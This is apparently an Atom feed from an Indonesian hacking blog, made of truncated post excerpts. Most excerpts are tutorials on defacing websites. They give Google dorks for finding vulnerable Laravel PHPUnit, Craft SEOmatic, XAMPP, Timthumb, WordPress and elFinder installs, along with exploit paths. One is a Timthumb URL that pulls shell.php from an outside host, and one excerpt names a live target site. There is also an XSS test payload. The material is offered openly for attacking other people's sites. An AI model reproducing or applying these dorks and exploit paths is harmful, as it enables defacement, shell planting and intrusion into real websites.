tag:blogger.com,1999:blog-24446443776497290672020-08-13T22:36:08.297-07:000x0senpai0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-2444644377649729067.post-39310896876368359542020-07-27T19:15:00.000-07:002020-07-28T06:47:35.489-07:00Apa Itu RCE (Remote Code Execution) dan apa dampak pada bug ini ?Hallo ^_^ kali ini saya akan share tentang Apa itu RCE (Remote Code Execution) dan apa dampak pada bug ini ? Apa itu RCE (Remote Code Execution) RCE (Remote Command Injection) adalah Dimana penyerang dapat memerintah sistem untuk menjalankan kode yang dinginkan, Tipe attack seperti ini biasanya karena kurangnya validasi terhadap data yang bisa dikendalikan oleh user. Apa dampak RCE (0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-24043175594426711862020-07-26T06:10:00.000-07:002020-07-26T06:10:46.352-07:00Exploit Laravel PHPUnit RCE ( Remote Code Execution )Hallo ^_^  kali ini saya akan share tutorial poc cara deface dengan Exploit Laravel PHPUnit RCE ( Remote Code Execution ) Pertama Dorking dulu dengan dork dibawah in bro DORK : inurl:/vendor/phpunit/phpunit/src inurl:/phpunit/src/Util/PHP/ Exploit  :  /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php Ok ku anggap kalian sudah punya tagetnya, langsung saja kita exploitnya seperti ini 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-13432676808710787882020-07-23T10:49:00.000-07:002020-07-23T10:49:07.550-07:00Cara Deface Dengan Exploit SSTI ( Server Side Template Injection )Hello para hacker, kali ini saya akan share tutorial Cara Deface Dengan Exploit SSTI ( Server Side Template Injection ) Pertama dorking dulu dengan dork ini bro inurl:/humans.txt intext:"Craft CMS" intext:SEOmatic filetype:txt site:*/humans.txt intext:SEOmatic /* TEAM */ inurl:/humans.txt Exploit : /actions/seomatic/meta-container/all-meta-containers?uri= ok ku anggap kalian dah punya 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-81497907488054941182020-01-28T23:15:00.000-08:002020-01-29T00:51:23.727-08:00XSSSNIPER An automatic XSS discovery tool XSSSNIPER xsssniper adalah alat penemuan xss yang berguna dengan fungsi pemindaian massal. Apa yang dilakukannya adalah memindai URL target untuk parameter GET dan kemudian menyuntikkan muatan XSS (Y) ke dalamnya dan mengurai respons untuk artefak injeksi (Z). Contoh paling sederhana adalah dengan menyuntikkan <script type = "text / javascript"> window.alert ('lol') </script> dan 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-70048467971550140342018-10-22T07:04:00.000-07:002020-07-24T16:12:31.993-07:00Cara deface dengan Exploit Timthumb V1.XX RCEHello ^^ kali ini saya akan share Cara deface dengan Exploit Timthumb V1.XX RCE yuk langsung saja ke tutorialnya, Dork : inurl:/timthumb.php  atau bisa kalian pake dengan List Dork Timthumb V1.XX RCE disini Exploit : timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php Disini saya punya live targetnya => http://cityfordhcm.com/timthumb.php Untuk ciri ciri web vuln rce 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-49686030165780643122018-10-22T07:03:00.000-07:002020-07-24T16:10:22.912-07:00List Dork Timthumb V1.XX RCE Hello ^^ kali ini saya akan share List Dork Timthumb V1.XX RCE . untuk yang belum tau Cara deface dengan Exploit Timthumb V1.XX RCE  bisa kalian liat disini  DORK Timthumb V1.XX RCE : Mungkin sekian dulu  dari saya mengenai artikel List Dork Timthumb V1.XX RCE semoga bermanfaat. 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-6381356903935166662018-10-22T05:26:00.000-07:002020-01-07T23:07:59.616-08:00Cara deface dengan XAMPP Local Write Access Hello ^^ kali ini saya akan share Cara deface dengan XAMPP Local Write Access yuk langsung saja ke tutorialnya,Dork :- inurl:/xampp/index.php intitle:XAMPP- inurl:/xampp/lang.php- inurl:/security/lang.php- inurl:/xampp/splash.php Exploit :- localhost/xampp/lang.php?hacked_by_h0d3_g4n- localhost/security/lang.php?hacked_by_h0d3_g4nTutorial :1. Cari targetnya pake Dork diatas.2. Masukan salah satu 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-51495660583117150032018-02-01T01:54:00.000-08:002020-01-07T23:07:59.979-08:00Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1Hello para defacer Indonesia, kali ini saya akan share Cara Deface Dengan Exploit Wordpress Content Injection 4.7.0/4.7.1Pertama dorking dulu dengan dork ini broinurl:/wp-includes/rest-api Exploit :http://target.com/wp-json/wp/v2/posts/Vuln seperti gambar dibawah inicopy idnya untuk script exploitnya kalian bisa copy disinihttps://www.exploit-db.com/exploits/41224/ edit bagian  "title" => "You 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-6391378233401288642018-01-31T12:03:00.000-08:002020-01-07T23:08:00.399-08:00Cara Deface Dengan Exploit Wordpress Themes Konzept Heloo Gan hehehekali ini mau share Cara Deface Dengan Exploit Wordpress Themes Konzept, ok langsung saja,Pertama Dorking dulu gan dengan dork ini,inurl:/includes/uploadify/uploads ok ku anggap kalian dah punya targetnya langsung saja kita exploit targetnya seperti inihttp://target.com/wp-content/themes/konzept/includes/uploadify/upload.phpjika vuln akan tampil seperti ini {"jsonrpc" : "2.0", "0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-21645925139277775142018-01-30T09:01:00.000-08:002020-01-07T23:08:00.766-08:00Cara sql injection menggunakan sqlmap Haloo gan , kali ini saya akan share tutorial hacking yaitu  Cara sql injection menggunakan sqlmap untuk hack website, xD .sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.langsung saja ke tutorialnya0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-52821131714210471922018-01-30T08:57:00.000-08:002020-01-07T23:08:01.128-08:00Cara Deface Dengan Exploit Wordpress Store Shell Upload Tutorial Deface With Exploit Wordpress Store Shell Upload  Hai gan ketemu lagi dengan saya  kumpul berbagi, yang sudah lama tidak  update wkwkwkwk tapi kali ini saya akan update setiap hari  karena ada sesuatu yang ada di blog ini   jadi kali ini mau share Cara Deface Dengan Exploit Wordpress Store Shell Upload  , ok langsung saja ke tutorialnya ...Pertama pertama dorking dulu dengan dork 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-2836984746802416012018-01-30T08:55:00.000-08:002020-01-07T23:08:01.489-08:00Tutorial deface dengan array qqfile shell uploadHello ^^ kali ini saya akan share Tutorial deface with array qqfile shell upload 2017.yuk langsung saja ke tutorialnya,dorking langsung kegoogle dengan dork dibawah iniinurl:server/uploads kembangin lagi ya :vsetelah mendapatkan targetnya kita exploit dengan /server/php.phpjadi seperti ini http://target.com/path/server/php.phpkalo vuln akan muncul tulisan seperti ini {"error":"No files were 0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0tag:blogger.com,1999:blog-2444644377649729067.post-65407488880896602902018-01-30T07:41:00.000-08:002020-01-07T23:08:01.851-08:00Cara Deface Dengan Auto Exploit ElfinderHello ^^ kali ini saya akan share Cara Deface Dengan Auto Exploit Elfindersembelum ke tutorialnya saya berterimakasih kepada Tu5b0l3d dan indoxploit yang bikin toolsnya xD .yuk langsung saja ke tutorialnya,dorking langsung kegoogle dengan dork dibawah iniDork = inurl:elfinder/filessetelah mendapatkan targetnya kita exploit dengan /php/connector.phpjadi seperti ini http://target.com/path/elfinder/0x0senpaihttp://www.blogger.com/profile/04826588603679552833noreply@blogger.com0